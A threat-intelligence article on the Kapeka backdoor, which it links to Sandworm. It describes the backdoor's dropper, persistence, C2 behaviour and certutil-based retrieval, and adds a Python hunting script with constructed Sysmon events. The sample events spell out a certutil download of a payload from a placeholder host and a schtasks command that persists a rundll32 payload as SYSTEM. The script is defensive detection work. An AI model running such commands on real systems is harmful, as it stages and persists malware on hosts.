Kapeka Backdoor: Russian APT Tool Used in Attacks Against Ukraine and Estonia
Finnish cybersecurity firm WithSecure has discovered a previously undocumented backdoor, Kapeka, used in attacks on Windows systems. Microsoft, which tracks the same malware as KnuckleTouch, notes that this flexible backdoor has been observed sporadically in attacks against Eastern European targets, including Estonia and Ukraine, since at least mid-2022.
WithSecure has attributed the malware to the Russia-linked Advanced Persistent Threat (APT) group known as Sandworm (also known as APT44 or Seashell Blizzard).
Details of Kapeka’s Deployment
Kapeka includes a dropper that writes the backdoor component to the infected host, launches it, and then deletes itself. The dropper also installs persistence for the backdoor, choosing the mechanism according to the privileges it is running with: a scheduled task when it has SYSTEM privileges, otherwise an autorun registry key.
In February 2024, Microsoft described Kapeka as being involved in multiple campaigns distributing ransomware. The backdoor, a Windows DLL written in C++, can be used for credential and data theft, destructive attacks, and remote access for the threat actor.
The DLL masquerades as a Microsoft Word add-in to appear legitimate. On startup it collects information about the compromised host; it then uses multiple threads to fetch incoming instructions, process them, and send the execution results back to a command-and-control (C2) server. Messages to and from the C2 are encoded as JSON, and the backdoor can update its configuration on the fly, receiving a new version from the C2 server when it polls. Its main capabilities are reading and writing files on disk, launching payloads, executing shell commands, and updating or uninstalling itself.
The Relationship Between Kapeka, GreyEnergy, and BlackEnergy
Kapeka's link to Sandworm rests on conceptual and configuration overlaps with malware previously attributed to the group: GreyEnergy, which is considered a likely successor to the BlackEnergy toolkit, and the Prestige ransomware.
How to Protect Yourself from the Kapeka Backdoor
The exact propagation method of Kapeka is currently unknown. Microsoft has reported that the dropper is retrieved from compromised websites using the certutil utility, a legitimate Windows binary abused as a "living-off-the-land" binary (LOLBin) so that the download needs no additional tooling on the host.
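Two of the behaviours described in this article are observable in endpoint telemetry: the certutil download from this section, and the privilege-dependent persistence choice (scheduled task as SYSTEM, autorun registry key otherwise) from "Details of Kapeka's Deployment". The following Python hunts for both over simplified Sysmon-style process-creation and registry-set events. It is an added example written for this article, not code from WithSecure or Microsoft; the event records, the URL, the task name, the SID and the file paths are all constructed for illustration.

```python
"""Hunting rules for the Kapeka tradecraft described in the article, run over
constructed Sysmon-style telemetry.  Added example, not vendor code; the event
fields are simplified from Sysmon event ID 1 (process creation) and ID 13
(registry value set)."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str                 # "process" (Sysmon 1) or "registry" (Sysmon 13)
    user: str                 # account the originating process ran as
    image: str                # executable path of the originating process
    command_line: str = ""    # process events only
    target_object: str = ""   # registry key\value path, registry events only


URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# certutil switches that fetch content from a URL (LOLBin download technique)
CERTUTIL_DOWNLOAD_SWITCHES = ("-urlcache", "-verifyctl")
AUTORUN_RE = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\", re.IGNORECASE)
TASKCACHE_RE = re.compile(r"\\Schedule\\TaskCache\\Tree\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_certutil_download(ev: Event) -> bool:
    """certutil pulling a file from a URL, the retrieval Microsoft reported for
    the Kapeka dropper.  Offline uses such as -hashfile carry no URL and do
    not match."""
    if ev.kind != "process" or basename(ev.image) != "certutil.exe":
        return False
    lowered = ev.command_line.lower()
    has_switch = any(sw in lowered for sw in CERTUTIL_DOWNLOAD_SWITCHES)
    return has_switch and bool(URL_RE.search(ev.command_line))


def is_autorun_registry_write(ev: Event) -> bool:
    """A Run/RunOnce value being set: the persistence route the dropper takes
    when it is NOT running as SYSTEM."""
    return ev.kind == "registry" and bool(AUTORUN_RE.search(ev.target_object))


def is_scheduled_task_creation(ev: Event) -> bool:
    """Scheduled-task persistence, the route taken with SYSTEM rights: either
    schtasks /create or a direct write under the TaskCache registry tree."""
    if ev.kind == "process":
        return basename(ev.image) == "schtasks.exe" and "/create" in ev.command_line.lower()
    return bool(TASKCACHE_RE.search(ev.target_object))


RULES = [
    ("certutil_url_download", is_certutil_download),
    ("autorun_registry_persistence", is_autorun_registry_write),
    ("scheduled_task_persistence", is_scheduled_task_creation),
]


def hunt(events: List[Event]) -> List[Tuple[str, Event]]:
    """Return (rule_name, event) for every event that matches a rule."""
    return [(name, ev) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry; names, paths, SID and URL are hypothetical.
SAMPLE_EVENTS = [
    # certutil fetching a payload from a web server (expected: flagged)
    Event("process", r"CORP\alice", r"C:\Windows\System32\certutil.exe",
          command_line=r"certutil.exe -urlcache -split -f http://example.invalid/d/update.bin "
                       r"C:\Users\alice\AppData\Local\Temp\update.bin"),
    # benign certutil use: hashing a local file, no URL (expected: not flagged)
    Event("process", r"CORP\alice", r"C:\Windows\System32\certutil.exe",
          command_line=r"certutil.exe -hashfile C:\Users\alice\Downloads\setup.msi SHA256"),
    # dropper running as the user persists through a Run value (expected: flagged)
    Event("registry", r"CORP\alice", r"C:\Users\alice\AppData\Local\Temp\update.bin",
          target_object=r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\OfficeUpdateCheck"),
    # dropper running as SYSTEM persists through a scheduled task (expected: flagged)
    Event("process", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\schtasks.exe",
          command_line=r'schtasks.exe /create /tn "OfficeUpdateCheck" '
                       r'/tr "rundll32.exe C:\ProgramData\OfficeAddins\wrd.wll,#1" /sc onstart /ru SYSTEM /f'),
    # ordinary registry write outside the autorun keys (expected: not flagged)
    Event("registry", r"CORP\alice", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          target_object=r"HKU\S-1-5-21-1000\Software\Microsoft\Office\16.0\Word\Options\LastDir"),
]

if __name__ == "__main__":
    for name, ev in hunt(SAMPLE_EVENTS):
        print(f"{name:32} user={ev.user:22} image={basename(ev.image)}")
```

Run stand-alone, the script reports three findings (the certutil download, the Run value and the schtasks creation) and stays silent on the hash check and the Word options write. In production the rules would be fed from a SIEM rather than an in-memory list, and the user field lets an analyst confirm the pattern the article describes: scheduled-task persistence arriving from a SYSTEM context, Run-key persistence from an ordinary user.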
Protective measures include keeping operating systems, software, and web applications up to date (the dropper is hosted on compromised websites, so patched web applications reduce the attacker's hosting options) and maintaining a proactive, awareness-driven security posture. Detection should focus on the behaviours described above: certutil fetching files from URLs, new scheduled tasks or autorun registry entries created by unexpected binaries, and DLLs posing as Word add-ins.
WithSecure's researchers hypothesize a direct relationship between Kapeka, GreyEnergy, and the older BlackEnergy, which was also used in the attacks against Ukraine in December 2015. If this hypothesis were confirmed, analyzing the three malware families side by side could provide vital insights into the evolution of Sandworm's capabilities: how its malicious code is developed, how much code is reused, whether it draws on third-party components developed by other Moscow-linked APTs, and whether it develops or uses zero-day exploits.